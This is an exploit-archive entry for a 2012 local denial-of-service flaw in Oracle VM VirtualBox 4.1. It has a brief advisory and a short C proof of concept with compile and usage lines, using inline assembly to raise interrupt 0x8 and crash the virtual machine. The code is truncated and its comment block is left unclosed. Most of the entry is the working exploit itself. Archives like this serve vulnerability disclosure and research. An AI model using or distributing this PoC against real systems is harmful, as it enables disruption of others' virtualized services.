[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Oracle VM VirtualBox 4.1 Local Denial of Service Vulnerability
# Published : 2012-09-10
# Author :
# Previous Title : XnView 1.98.8 PCT Image Processing Heap Overflow
# Next Title : Pure-FTPd v1.0.21 (centos 6.2, ubuntu 8.04) Crash PoC (Null Pointer Dereference)

Source: http://www.securityfocus.com/bid/55471/info

Oracle VM VirtualBox is prone to a local denial-of-service vulnerability. 

Attackers can exploit this issue to cause denial-of-service conditions.

/** This software is provided by the copyright owner "as is" and any
 *  expressed or implied warranties, including, but not limited to,
 *  the implied warranties of merchantability and fitness for a particular
 *  purpose are disclaimed. In no event shall the copyright owner be
 *  liable for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
 *  Copyright (c) 2012 halfdog <me (%) halfdog.net>
 *  Compile: gcc -o RtcInt RtcInt.c
 *  Usage: ./RtcInt 
int main(int argc, char **argv) {
  asm (
    "int $0x8;"
    : // output: none
    : // input: none
    :"%eax", "%ebx", "%ecx", "%edx"   // clobbered register